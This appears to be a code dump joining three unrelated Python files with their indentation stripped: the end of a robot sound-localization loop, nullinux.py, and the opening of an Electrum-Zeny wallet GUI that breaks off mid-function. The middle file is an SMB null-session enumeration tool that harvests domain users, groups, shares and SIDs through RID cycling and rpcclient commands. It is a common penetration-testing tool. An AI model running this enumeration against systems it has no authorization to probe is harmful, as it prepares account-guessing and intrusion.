# os.path.join(self.KWS.WAV_PATH, denoised_sig_fname))
#
# if self.denoise is False:
# final_file = wakeup_wav
# else:
# final_file = denoised_sig_fname
#
# else:
# # active detection
# print("start monitoring ... ")
# while True:
# event.wait()
# # print("start monitoring ... ")
# frames = self.monitor_from_4mics()
#
# # store the signal
# file_name = os.path.join(WAV_PATH, str(num_saved_sig) + ".wav")
# self.savewav(file_name, frames)
#
# # de-noise the signal into new file, then VAD and split
# denoised_sig_fname = str(num_saved_sig) + '_denoised.wav'
# de_noise(os.path.join(WAV_PATH, ini_sig_fname), os.path.join(WAV_PATH, denoised_sig_fname))
#
# # if exceed, break, split to process, then action. After action done, begin monitor
#
# if self.de is False:
# final_file = ini_sig_fname
# else:
# final_file = denoised_sig_fname
#
# if judge_active(os.path.join(WAV_PATH, final_file)):
# print("Detected ... ")
# break
#
# Split
''''''
# produce action
"""
use four mic file to be input to produce action
"""
if self.debug:
self.save_dir_name = 'self_collected'
ini_dir = os.path.join(WAV_PATH, self.save_dir_name, 'ini_signal')
ini_signals = self.read_multi_channel_audio(ini_dir, num_channel=CHANNELS)
else:
self.save_dir_name = 'test'
frames = self.monitor_from_4mics()
ini_signals = self.split_channels_from_frames(frames=frames, num_channel=CHANNELS, mapping_flag=True)
ini_dir = os.path.join(WAV_PATH, self.save_dir_name, 'ini_signal')
self.save_multi_channel_audio(ini_dir, ini_signals, fs=SAMPLE_RATE, norm=False, )
# norm_dir = os.path.join(WAV_PATH, 'test', 'norm_signal')
# self.save_multi_channel_audio(norm_dir, ini_signals, fs=SAMPLE_RATE, norm=True, )
audio_segments, drop_flag = self.preprocess_ini_signal(ini_signals)
# print('Number of preprocessed audio segments: ', len(audio_segments))
direction = None
if len(audio_segments) > 0:
gcc_feature_batch = self.doa.extract_gcc_phat_4_batch(audio_segments)
# length=len(gcc_feature_batch)
gcc_feature = np.mean(gcc_feature_batch, axis=0)
self.ac.state_ = gcc_feature
# # detect invalid direction
# invalids_dire = map.detect_invalid_directions()
# print("invalids_dire of walker: ", invalids_dire)
# invalids_idx = [(i + 45) % 360 / 45 for i in invalids_dire]
# direction_prob, direction_cate, = self.doa.predict([gcc_feature], invalid_classes=None)
direction_prob, direction, = self.ac.predict(state=gcc_feature, invalid_classes=None)
direction = direction[0]
# print(direction_prob)
# print(direction_cate)
# direction = stats.mode(direction_cate)[0][0] * 45
print("producing action ...\n", 'Direction', direction)
SSLturning(control, direction * 45)
# control.speed = STEP_SIZE / FORWARD_SECONDS
# control.radius = 0
# control.omega = 0
# time.sleep(FORWARD_SECONDS)
# control.speed = 0
# print("movement done.")
self.ac.state_ = gcc_feature
self.ac.action_ = direction
# set reward
while True:
try:
reward = int(input('Please input reward:'))
except:
continue
else:
break
self.ac.learn(self.ac.state, self.ac.state_, reward)
# maintain the state varibles
self.ac.state = self.ac.state_
self.ac.action = self.ac.action_
self.ac.reward = reward
self.ac.reward_sum += reward
#
# print('Wait ~ ')
if __name__ == '__main__':
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
ssl = SSL(denoise=True, seg_len='256ms', debug=False)
# cd = CD.ControlDriver(left_right=0)
cd = ''
temp = threading.Event()
temp.set()
# p2 = threading.Thread(target=cd.control_part, args=())
p1 = threading.Thread(target=ssl.loop, args=(temp, cd,))
# p2.start()
p1.start()
|
nullinux.py
|
#!/usr/bin/env python3
# Author: @m8r0wn
# License: GPL-3.0
# Python2/3 compatibility for print('', end='')
from __future__ import print_function
import sys
import argparse
import datetime
from time import sleep
from ipparser import ipparser
from threading import Thread, activeCount
if sys.version_info[0] < 3:
from commands import getoutput
else:
from subprocess import getoutput
class nullinux():
known_users = ['Administrator', 'Guest', 'krbtgt', 'root', 'bin']
domain_sid = ""
acquired_users = []
def __init__(self, username, password, verbose):
self.group_count = 0
self.username = username
self.password = password
self.verbose = verbose
def enum_os(self, target):
cmd = "smbclient //{}/IPC$ -U {}%{} -t 1 -c exit".format(target,self.username, self.password)
for line in getoutput(cmd).splitlines():
if "Domain=" in line:
print_success("{}: {}".format(target, line))
elif "NT_STATUS_LOGON_FAILURE" in line:
print_failure("{}: Authentication Failed".format(target))
def get_dom_sid(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating Domain Information for: {}".format(target))
cmd = "rpcclient -c lsaquery -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
if "Domain Name:" in line:
print_success(line)
elif "Domain Sid:" in line:
self.domain_sid = line.split(":")[1].strip()
print_success("Domain SID: {}".format(self.domain_sid))
if not self.domain_sid:
print_failure("Could not attain Domain SID")
def create_userfile(self):
openfile = open('nullinux_users.txt', 'w')
for user in self.acquired_users:
if user == self.acquired_users[0]:
openfile.write(user)
else:
openfile.write('\n{}'.format(user))
openfile.close()
def enum_shares(self, target):
count = 0
acquired_shares = []
smbclient_types = ['Disk', 'IPC', 'Printer']
print("\n\033[1;34m[*]\033[1;m Enumerating Shares for: {}".format(target))
cmd = "smbclient -L {} -U {}%{} -t 2".format(target, self.username, self.password)
for line in getoutput(cmd).splitlines():
if count == 0: #Print Enum Share Heading
print(" {:26} {}".format("Shares", "Comments"))
print(" " + "-" * 43)
count += 1
for t in smbclient_types: #Check if output in known share types
if t in line:
try:
if 'IPC$' in line:
print(" \\\{}\{}".format(target, "IPC$"))
acquired_shares.append("IPC$")
else:
share = line.split(t)[0].strip()
comment = line.split(t)[1].strip()
print(" \\\{}\{:15} {}".format(target, share, comment))
acquired_shares.append(share)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
if acquired_shares:
#Enumerate dir of each new share
for s in acquired_shares:
self.enum_dir(target, s)
else:
print(" ")
print_failure("No Shares Detected")
def share_header(self, target, share):
print("\n ", end='')
print_status("Enumerating: \\\%s\%s" % (target, share))
def enum_dir(self, target, share):
header_count = 0
cmd = "smbclient //{}/\'{}\' -t 3 -U {}%{} -c dir".format(target, share, self.username, self.password)
for line in getoutput(cmd).splitlines():
if "NT_STATUS" in line or "_ACCESS_DENIED" in line:
if self.verbose:
if header_count == 0:
header_count += 1
self.share_header(target, share)
print(" ", end='')
print_failure(line)
elif "Domain=" in line or "blocks available" in line or "WARNING" in line or "failed:" in line or not line:
pass
else:
if header_count == 0:
header_count += 1
self.share_header(target, share)
print(" "+line)
def enum_querydispinfo(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating querydispinfo for: {}".format(target))
cmd = "rpcclient -c querydispinfo -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
try:
user_account = line.split("Name:")[0].split("Account:")[1].strip()
print(" " + user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_enumdomusers(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating enumdomusers for: {}".format(target))
cmd = "rpcclient -c enumdomusers -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
try:
user_account = line.split("[")[1].split("]")[0].strip()
print(" "+user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_lsa(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating LSA for: {}".format(target))
cmd = "rpcclient -c lsaenumsid -U {}%{} {}".format(self.username, self.password, target)
output = getoutput(cmd)
for line in output.splitlines():
try:
if "S-1-5-21" in line:
user_sid = "rpcclient -c 'lookupsids {}' -U {}%{} {}".format(line, self.username, self.password, target)
for x in getoutput(user_sid).splitlines():
user_account = x.split("\\")[1].split("(")[0].strip()
count = int(x.split("(")[1].split(")")[0].strip())
if count == 1:
if self.verbose:
print(" "+x)
else:
print(" "+user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
elif count > 1 and "*unknown*\*unknown*" not in line:
if self.verbose:
print(" {:35} (Network/LocalGroup)".format(x))
else:
print(" {:35} (Network/Local Group)".format(user_account))
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def rid_cycling(self, target, ridrange, max_threads):
print("\n\033[1;34m[*]\033[1;m Performing RID Cycling for: {}".format(target))
if not self.domain_sid:
print_failure("RID Failed: Could not attain Domain SID")
return False
# Handle custom RID range input
try:
r = ridrange.split("-")
rid_range = list(range(int(r[0]), int(r[1])+1))
except:
print_failure("Error parsing custom RID range, reverting to default")
rid_range = list(range(500, 531))
for rid in rid_range:
try:
Thread(target=self.rid_thread, args=(rid,target,), daemon=True).start()
except:
pass
while activeCount() > max_threads:
sleep(0.001)
# Exit all threads before returning
while activeCount() > 1:
sleep(0.001)
def rid_thread(self, rid, target):
print(rid)
cmd = "rpcclient -c \"lookupsids {}-{}\" -U {}%{} {}".format(self.domain_sid, rid, self.username, self.password,target)
for line in getoutput(cmd).splitlines():
if "S-1-5-21" in line:
# Split output to get username/group name
user_account = line.split("\\")[1].split("(")[0].strip()
count = int(line.split("(")[1].split(")")[0].strip())
if count == 1:
if self.verbose:
print(" " + line)
else:
print(" " + user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
elif count > 1 and "*unknown*\*unknown*" not in line:
if self.verbose:
print(" {:35} (Network/LocalGroup)".format(line))
else:
print(" {:35} (Network/LocalGroup)".format(user_account))
def enum_known_users(self, target):
print("\n\033[1;34m[*]\033[1;m Testing {} for Known Users".format(target))
for user in self.known_users:
cmd = "rpcclient -c \"lookupnames {}\" -U {}%{} {}".format(user, self.username, self.password, target)
for line in getoutput(cmd).splitlines():
if "S-1-5" in line:
try:
user_account = line.split(" ")[0].strip()
if self.verbose:
print(" " + line)
else:
print(" " + user_account)
if user_account not in self.acquired_users and int(line.split("User:")[1]) == 1:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_dom_groups(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating Group Memberships for: {}".format(target))
cmd = "rpcclient -c enumdomgroups -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
if "rid:" in line:
try:
group = line.split("[")[1].split("]")[0].strip()
print_success("Group: %s" % (group))
self.group_count += 1
self.enum_group_mem(target, group)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_group_mem(self, target, group):
cmd = "net rpc group members \'{}\' -U {}%{} -I {}".format(group, self.username, self.password, target)
for line in getoutput(cmd).splitlines():
try:
user_account = line.split("\\")[1].strip()
print(" " + user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def print_success(msg):
print('\033[1;32m[+] \033[1;m'+msg)
def print_status(msg):
print('\033[1;34m[*] \033[1;m'+msg)
def print_failure(msg):
print('\033[1;31m[-] \033[1;m'+msg)
def time_stamp():
return datetime.datetime.now().strftime('%m-%d-%Y %H:%M')
def main(args):
try:
print("\n Starting nullinux v{} | {}\n\n".format(version, time_stamp()))
for t in args.target:
#enum os
scan = nullinux('\"{}\"'.format(args.username), '\"{}\"'.format(args.password), args.verbose)
scan.enum_os(t)
#enum shares
if args.shares or args.all:
scan.enum_shares(t)
#enum users
if args.users or args.all:
if not scan.domain_sid:
scan.get_dom_sid(t)
scan.enum_querydispinfo(t)
scan.enum_enumdomusers(t)
#bypass on quick option
if not args.quick:
scan.enum_lsa(t)
scan.rid_cycling(t, args.rid_range, args.max_threads)
scan.enum_known_users(t)
scan.enum_dom_groups(t)
#if users, write to file, close
if scan.acquired_users:
print("\n\033[1;32m[+]\033[1;m {} USER(s) identified in {} GROUP(s)".format(len(scan.acquired_users), scan.group_count))
print("\033[1;34m[*]\033[1;m Writing users to file: ./nullinux_users.txt\n")
scan.create_userfile()
else:
print("\n\033[1;31m[-]\033[1;m No valid users or groups detected\n")
except Exception as e:
print("\n[*] Main Error: {}\n\n".format(e))
if __name__ == '__main__':
try:
version = '5.3.2'
args = argparse.ArgumentParser(description=("""
nullinux | v{0}
-----------------------------------
SMB null-session enumeration tool to gather OS,
user, share, and domain information.
usage:
python3 nullinux.py -users -quick DC1.Domain.net
python3 nullinux.py -all -r 500-600 192.168.0.0-5
python3 nullinux.py -shares -U 'Domain\\User' -P 'Password1' 10.0.0.1,10.0.0.5""").format(version), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)
args.add_argument('-u', '-U', dest='username', type=str, default="", help='Username')
args.add_argument('-p', '-P', dest='password', type=str, default="", help='Password')
args.add_argument('-v', dest="verbose", action='store_true', help="Verbose output")
args.add_argument('-shares', dest="shares", action='store_true', help="Enumerate shares")
args.add_argument('-users', dest="users", action='store_true', help="Enumerate users")
args.add_argument('-a', '-all', dest="all", action='store_true', help="Enumerate shares & users")
args.add_argument('-q', '-quick', dest="quick", action='store_true', help="Fast user enumeration (use with -users or -all)")
args.add_argument('-r', dest='rid_range', type=str, default="500-530", help='Set Custom RID cycling range (Default: 500-530)')
args.add_argument('-t', dest='max_threads', type=int, default=5, help='Max threads for RID cycling (Default: 5)')
args.add_argument(dest='target', nargs='+', help='Target server')
args = args.parse_args()
args.target = ipparser(args.target[0])
#Start Main
main(args)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum_zeny as electrum
from electrum_zeny.bitcoin import TYPE_ADDRESS
from electrum_zeny import WalletStorage, Wallet
from electrum_zeny_gui.kivy.i18n import _
from electrum_zeny.paymentrequest import InvoiceStore
from electrum_zeny.util import profiler, InvalidPassword
from electrum_zeny.plugins import run_hook
from electrum_zeny.util import format_satoshis, format_satoshis_plain
from electrum_zeny.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_zeny_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_zeny_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_zeny.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_zeny.network import DEFAULT_PORTS
pp = servers.get(host, DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Electrum-MONA App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', False)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_zeny.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitzeny:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_zeny.transaction import Transaction
from electrum_zeny.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'requests']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_zeny.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
Intent = autoclass('android.content.Intent')
intent = Intent("com.google.zxing.client.android.SCAN")
intent.putExtra("SCAN_MODE", "QR_CODE_MODE")
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
try:
PythonActivity.mActivity.startActivityForResult(intent, 0)
except:
self.show_error(_('Could not start Barcode Scanner.') + ' ' + _('Please install the Barcode Scanner app from ZXing'))
def scan_qr_zxing(self, on_complete):
# uses zxing embedded lib
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
IntentIntegrator = autoclass('com.google.zxing.integration.android.IntentIntegrator')
integrator = IntentIntegrator(PythonActivity.mActivity)
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
integrator.initiateScan()
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitzeny: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_zeny_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_zeny_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_zeny_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_zeny_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
